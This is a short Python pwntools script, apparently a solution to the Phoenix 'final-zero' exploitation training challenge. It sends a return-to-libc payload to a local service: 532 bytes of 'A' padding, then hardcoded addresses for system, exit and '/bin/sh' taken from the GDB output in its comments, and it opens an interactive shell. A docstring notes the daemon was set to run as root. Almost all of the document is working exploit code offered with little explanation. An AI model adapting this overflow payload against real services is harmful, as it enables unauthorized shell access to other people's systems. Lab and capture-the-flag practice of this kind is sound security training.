final 0 phoenix ret2libc

1. #!/usr/bin/python
2.  
3. from pwn import *
4.  
5. p = remote("localhost", 64013)
6.  
7. def main():
8.     '''
9.     /etc/systemd/system
10.     Run daemon as root:
11.    
12.     [Service]
13.     Type=simple
14.     Restart=always
15.     #User=phoenix-i386-final-zero
16.     #User=phoenix-i386-final-zero
17.     User=root
18.     User=root
19.     '''
20.  
21.     # Skips prompt
22.     p.recvrepeat(0.2)
23.  
24.     # From GDB:
25.     #
26.     # Stopped reason: SIGSEGV
27.     # 0x41507341 in ?? ()
28.     #
29.     # gdb-peda$ pattern_offset 0x41507341
30.     # 1095791425 found at offset: 532
31.  
32.     log.info("Crafting payload")
33.     buf = "A" * 532
34.    
35.     # From GDB:
36.     #
37.     # gdb-peda$ p system
38.     # $4 = {<text variable, no debug info>} 0xf7fad824 <system>
39.     #
40.     # gdb-peda$ p exit
41.     # $5 = {<text variable, no debug info>} 0xf7f7f543 <exit>
42.     #
43.     # gdb-peda$ find "/bin/sh"
44.     # Found 2 results, display max 2 items:
45.     # libc.so : 0xf7ff867a ("/bin/sh")
46.     # --snip--
47.  
48.     system_addr = 0xf7fad824
49.     bin_sh_addr = 0xf7ff867a
50.     exit_addr = 0xf7f7f543
51.  
52.     #---------------#
53.     # 532 A(Junk)   #
54.     #---------------#
55.     # system_addr   #
56.     #---------------#
57.     # exit_addr     #
58.     #---------------#
59.     # bin_sh_addr   #
60.     #---------------#
61.    
62.     buf += p32(system_addr)
63.     buf += p32(exit_addr) # Graceful exit
64.     buf += p32(bin_sh_addr)
65.  
66.     p.sendline(buf) # Sends payload
67.     log.warn("Payload sent!")
68.  
69.     p.interactive() # Pass interaction back to user
70.  
71. if __name__ == "__main__":
72. main()